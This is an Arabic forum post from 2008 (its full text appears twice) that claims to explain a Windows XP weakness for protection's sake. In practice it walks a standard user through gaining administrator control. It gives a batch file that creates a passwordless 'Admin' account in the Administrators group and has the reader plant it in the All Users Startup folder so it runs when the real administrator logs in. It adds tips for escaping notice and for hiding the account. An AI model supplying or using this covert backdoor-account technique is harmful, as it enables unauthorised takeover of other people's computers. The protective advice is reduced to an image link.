megnonetota
12-30-2008, 05:40 PM
http://i35.tinypic.com/ye1rq.jpg
http://i36.tinypic.com/dnkpcm.jpg
http://i38.tinypic.com/20zxu08.jpg
http://i35.tinypic.com/jqjrs4.jpg
اليوم بشرح لكم طريقة يتمكن فيها المستخدم بصلاحيات عادية بعمل حساب في ويندوز XP يتمتع بصلاحيات الأدمين و الهدف من موضوعي ليس إلا توضيح هذه الثغرة و الحماية منها . فأرجو كل من يقرأ هذا الموضوع بعدم التجربة على أجهزة الآخرين .
لنفرض انك مستخدم عادي لا تتمتع بصلاحيات الأدمين وتريد أن تتمتع بصلاحيات الأدمين لسسبب ما كل ما عليك القيام به كالآتي :
انسخ ما هو مكتوب في الأسفل
كود PHP:
@echo off
net user Admin /add /expires:never /passwordreq:no
net localgroup "Administrators" /add Admin
وضع هذا الكود في ملف TXT وسميه
admin.bat
والآن ضع هذا الباتش في داخل المجلد
Startup
وهذا المجلد موجود في هذا المسار
C:\********s and Settings\All Users\Start Menu\Programs\Startup
الآن تنتظر حتى يدخل الأدمين الحقيقي فقط أول مرة حتى يتم تفعيل هذا الباتش , ولا تنجح هذه العملية إلا بعد دخول الأدمين فقط لمرة واحدة وبعدها سيكون لديك حساب أدمين و تستطيع حتى أن تحذف أو تغير باسورد الأدمين الحقيقي وتكون
انت المالك للجهاز , ولكن لا أنصحك بعمل ذلك ولا تعمل لأي شئ يلفت إنتباه الأدمين الحقيقي .
سيكون اسم حسابك
Admin
هناك إحتمال أن ينكشف هذا الباتش بنفس اللحظة ولكن 99% أن لا ينتبه الأدمين . لأنه بعد دخول الأدمين الحقيقي للويندوز ستظهر شاشة دوس لمدة ثانية أو أكثر بقليل وبعدها تختفي بسرعة و إذا كان منتبها وأكتشف الباتش فأنت المسؤول http://www.bramjnet.com/vb3/images/smailes/smailes41.gif
وهناك نقطة مهمة جدا يجب الإنتباه إليها ولا تنساها أبدا , بعد خروجك سيظهر أسم الأدمين الجديد في شاشة إستقبال الويندوز وهناك طرق كثيرة لإخفاء الإسم وعليك انت أن تعرفها بنفسك حتى لا أتحمل إثم وأكون مسؤول عليها .
أسهل طريقة لمنع حدوث ذلك في جهازك موجود في الصورة
http://i34.tinypic.com/2ahxls1.jpg
http://i36.tinypic.com/dnkpcm.jpg
http://i38.tinypic.com/20zxu08.jpg
http://i35.tinypic.com/jqjrs4.jpg
اليوم بشرح لكم طريقة يتمكن فيها المستخدم بصلاحيات عادية بعمل حساب في ويندوز XP يتمتع بصلاحيات الأدمين و الهدف من موضوعي ليس إلا توضيح هذه الثغرة و الحماية منها . فأرجو كل من يقرأ هذا الموضوع بعدم التجربة على أجهزة الآخرين .
لنفرض انك مستخدم عادي لا تتمتع بصلاحيات الأدمين وتريد أن تتمتع بصلاحيات الأدمين لسسبب ما كل ما عليك القيام به كالآتي :
انسخ ما هو مكتوب في الأسفل
كود PHP:
@echo off
net user Admin /add /expires:never /passwordreq:no
net localgroup "Administrators" /add Admin
وضع هذا الكود في ملف TXT وسميه
admin.bat
والآن ضع هذا الباتش في داخل المجلد
Startup
وهذا المجلد موجود في هذا المسار
C:\********s and Settings\All Users\Start Menu\Programs\Startup
الآن تنتظر حتى يدخل الأدمين الحقيقي فقط أول مرة حتى يتم تفعيل هذا الباتش , ولا تنجح هذه العملية إلا بعد دخول الأدمين فقط لمرة واحدة وبعدها سيكون لديك حساب أدمين و تستطيع حتى أن تحذف أو تغير باسورد الأدمين الحقيقي وتكون
انت المالك للجهاز , ولكن لا أنصحك بعمل ذلك ولا تعمل لأي شئ يلفت إنتباه الأدمين الحقيقي .
سيكون اسم حسابك
Admin
هناك إحتمال أن ينكشف هذا الباتش بنفس اللحظة ولكن 99% أن لا ينتبه الأدمين . لأنه بعد دخول الأدمين الحقيقي للويندوز ستظهر شاشة دوس لمدة ثانية أو أكثر بقليل وبعدها تختفي بسرعة و إذا كان منتبها وأكتشف الباتش فأنت المسؤول http://www.bramjnet.com/vb3/images/smailes/smailes41.gif
وهناك نقطة مهمة جدا يجب الإنتباه إليها ولا تنساها أبدا , بعد خروجك سيظهر أسم الأدمين الجديد في شاشة إستقبال الويندوز وهناك طرق كثيرة لإخفاء الإسم وعليك انت أن تعرفها بنفسك حتى لا أتحمل إثم وأكون مسؤول عليها .
أسهل طريقة لمنع حدوث ذلك في جهازك موجود في الصورة
http://i34.tinypic.com/2ahxls1.jpg